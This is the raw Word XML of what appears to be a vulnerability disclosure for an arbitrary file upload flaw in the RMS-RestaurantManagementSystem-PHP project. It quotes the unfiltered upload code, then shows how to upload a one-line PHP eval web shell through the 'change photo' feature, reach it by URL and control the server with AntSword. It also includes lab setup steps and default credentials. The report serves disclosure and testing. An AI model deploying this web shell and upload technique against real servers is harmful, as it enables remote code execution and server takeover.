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DDA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 RMS-RestaurantManagementSystem-PHP File Upload Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE1F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Vulnerability Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896A2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A file upload vulnerability exists in RMS-RestaurantManagementSystem-PHP, specifically in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`change photo`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function of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`http://aaa/code/dashboard.php#`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</w:p>
    <w:p w14:paraId="0760F2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</w:p>
    <w:p w14:paraId="63C36E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The vulnerability stems from the following code in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`RMS-RestaurantManagementSystem-PHP-master/code/dashboard.php`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074D70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```php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F98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($file_Name !=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25BDAA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creating image file path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7D2A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$fileTmpName = $_FILES[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'image'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'tmp_name'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7AA94B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$path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"../source/menu_image/"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. $file_Name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4A66D7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388B5E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$sql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MENU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('$item_name', '$file_Name', $price, '$category', '$description')"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DCB2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($conn-&gt;query($sql)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729E5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move_uploaded_file($fileTmpName, $path);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7E4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$info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"Upload successful..."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17D8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8C2E6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  $info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"VALUE INSERT FAIL!!!"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134D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62841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128A0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$imageError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"Select image first"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C5DC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CFD7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0DBAF6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The code directly uses the user-controllable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`$_FILES['image']['name']`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(original filename) without any filtering or renaming, leading to an arbitrary file upload vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3C6022">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796AF4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Demonstration Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E07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01. Prepare Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B9C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Create a file named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`1.php`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with the following content (a PHP one-sentence Trojan):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AA35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```php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A729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&lt;?php @eval($_POST[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'attack'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]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79618E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</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3392D1AE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4150" cy="2959735"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12065"/>
            <wp:docPr id="1" name="图片 1" descr="d90e21e4e72a313ffcafd7f90f4f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0e21e4e72a313ffcafd7f90f4f35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E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02. Successful Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E988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Upload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`1.php`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file via the "change photo" function. The file will be stored in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`source/profile_photos`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directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA5ADEA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055" cy="2969895"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="2" name="图片 2" descr="641b1f57e61c976ae158c7ac1d204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41b1f57e61c976ae158c7ac1d204a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5D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03. Access the Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573B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Visit the uploaded file directly via the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEBD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`http://aaa/source/profile_photos/1.php`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2043176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58435" cy="2948940"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="3" name="图片 3" descr="356a97369f82e358d8af40e05a3de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56a97369f82e358d8af40e05a3de4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7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04. Connect with AntSword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C29D0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Use the AntSword tool to connect to the malicious file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13721DE0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2880" cy="3522345"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13335"/>
            <wp:docPr id="4" name="图片 4" descr="80584ebad6c6161cfca287ea3371a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0584ebad6c6161cfca287ea3371abb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7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05. Further Server Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A915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After successful connection, gain access to the server's file system and execute commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F141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2880" cy="3526155"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>
            <wp:docPr id="5" name="图片 5" descr="4e397f6951c44e785eb0a81206598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e397f6951c44e785eb0a81206598e7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14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0500" cy="3618865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="6" name="图片 6" descr="b87584241265627ee313415df1f8f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87584241265627ee313415df1f8fd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72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Setup and Review Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267DC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Download Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479976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`https://github.com/DhyanMoradiya/RMS-RestaurantManagementSystem-PHP/tree/master`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FDEC28">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9D9F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Directory Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A2B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The project is developed with HTML5, CSS3, JavaScript, PHP, and MySQL, featuring modules like order management, billing, and menu management. Key directories include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458DBD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2959735"/>
            <wp:effectExtent l="0" t="0" r="889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5F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Setup Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2D4B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**Place the Project**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Move the entire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`RMS-RestaurantManagementSystem-PHP-master`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folder to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`WWW`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directory of phpStudy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC4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**Start Services**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 Launch Apache/Nginx and MySQL services in phpStudy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F16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**Create and Configure Database**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774D27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Create a database named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`RMS`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</w:p>
    <w:p w14:paraId="0E725A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Import the 5 built-in SQL files (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`bill.sql`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`menu.sql`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`orders.sql`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`register.sql`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`tables.sql`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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E31FE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25470"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13970"/>
            <wp:docPr id="8" name="图片 8" descr="2dbc7462-66cc-4c03-b514-56439f16d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dbc7462-66cc-4c03-b514-56439f16d3f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4E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**Modify Configuration Files**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 Update database credentials in the following files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7CB5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`login.php`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`ready.php`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`removeFromCart.php`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`removeMenuItem.php`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`removePhoto.php`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`removeUser.php`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`serve.php`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`dashboard.php`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`payment.php`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`order.php`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2123B3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```php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205CCD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$server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B0BE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$username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'123456'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B2B61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$password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'123456'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FBCA8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$dbname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'RMS'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8440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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69D1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**Create a New Website**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27724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Domain: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`aaa`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1008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Port: 80 (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CDEA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Root Directory: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`D:/phpstudy_pro/WWW/RMS-RestaurantManagementSystem-PHP-master`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6493D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PHP Version: PHP 7.0.9 NTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5CA5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Enable "Synchronize hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C19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147820"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12700"/>
            <wp:docPr id="9" name="图片 9" descr="784f0990-d76b-4937-82be-b65e913ce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84f0990-d76b-4937-82be-b65e913ce0f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BF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**Access the System**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50417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Home Page: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`http://aaa/code/home.php`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D136F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Login Page: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`http://aaa/code/login.php`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162993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Default Credentials: Phone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`9714877117`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Password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`12345`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A8B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4150" cy="2959735"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1206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20AF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0080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>**Locate the Vulnerable Function**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Navigate to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`http://aaa/code/dashboard.php#`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and find the "change photo" feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF4BD45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67325" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="5715" b="508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FE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. Prepare Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086701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Create a file named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`1.php`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with the following content (a PHP one-sentence Trojan):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336D81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```php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B97F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&lt;?php @eval($_POST[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'attack'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]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73328A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6370E3CE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4150" cy="2959735"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12065"/>
            <wp:docPr id="11" name="图片 11" descr="d90e21e4e72a313ffcafd7f90f4f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90e21e4e72a313ffcafd7f90f4f35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8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. Successful Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFBD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Upload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`1.php`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file via the "change photo" function. The file will be stored in the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`source/profile_photos`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directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491EC03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055" cy="2969895"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="12" name="图片 12" descr="641b1f57e61c976ae158c7ac1d204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41b1f57e61c976ae158c7ac1d204a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09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. Access the Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02759F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Visit the uploaded file directly via the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E828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`http://aaa/source/profile_photos/1.php`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646D2BE6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58435" cy="2948940"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="13" name="图片 13" descr="356a97369f82e358d8af40e05a3de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56a97369f82e358d8af40e05a3de4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C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. Connect with AntSword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D3C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Use the AntSword tool to connect to the malicious file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667CC0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2880" cy="3522345"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13335"/>
            <wp:docPr id="14" name="图片 14" descr="80584ebad6c6161cfca287ea3371a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0584ebad6c6161cfca287ea3371abb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B6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eastAsia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. Further Server Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A747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After successful connection, gain access to the server's file system and execute commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE57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2880" cy="3526155"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>
            <wp:docPr id="15" name="图片 15" descr="4e397f6951c44e785eb0a81206598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e397f6951c44e785eb0a81206598e7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57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70500" cy="3618865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="16" name="图片 16" descr="b87584241265627ee313415df1f8f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87584241265627ee313415df1f8fd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4B14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8B3A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5183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RuS5b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G5Ll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5183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ADD755"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5EADD755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B70C4"/>
    <w:rsid w:val="130A061A"/>
    <w:rsid w:val="16190030"/>
    <w:rsid w:val="17F51620"/>
    <w:rsid w:val="1E983160"/>
    <w:rsid w:val="21C1390C"/>
    <w:rsid w:val="23C35A13"/>
    <w:rsid w:val="264A1B0E"/>
    <w:rsid w:val="28F93369"/>
    <w:rsid w:val="302F2063"/>
    <w:rsid w:val="36A60CE5"/>
    <w:rsid w:val="439A3786"/>
    <w:rsid w:val="458A4B1F"/>
    <w:rsid w:val="484F25B3"/>
    <w:rsid w:val="4CFB2DB1"/>
    <w:rsid w:val="5B9067AF"/>
    <w:rsid w:val="5BE21435"/>
    <w:rsid w:val="5CD31049"/>
    <w:rsid w:val="61164A61"/>
    <w:rsid w:val="625C560B"/>
    <w:rsid w:val="65066D83"/>
    <w:rsid w:val="65E47E23"/>
    <w:rsid w:val="68282249"/>
    <w:rsid w:val="6B8579B3"/>
    <w:rsid w:val="753A2574"/>
    <w:rsid w:val="77ED5D88"/>
    <w:rsid w:val="7A377CD5"/>
    <w:rsid w:val="7C794503"/>
    <w:rsid w:val="7D63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471</Words>
  <Characters>3335</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>29</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3833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2025-11-06T15:53:00Z</dcterms:created>
  <dc:creator>14766</dc:creator>
  <cp:lastModifiedBy>WPS_1693986910</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-14T13:49:33Z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eyJoZGlkIjoiZDBmMzU3YjE2ZTI3ZjFiNjRhNDQzZjk5Yjk3YzA5MWQiLCJ1c2VySWQiOiIxNTI5NjAyNDA5In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>4B8ACC0CC0874DF9B8E16A3B49CBD96D_13</vt:lpwstr>
  </property>
</Properties>
</file>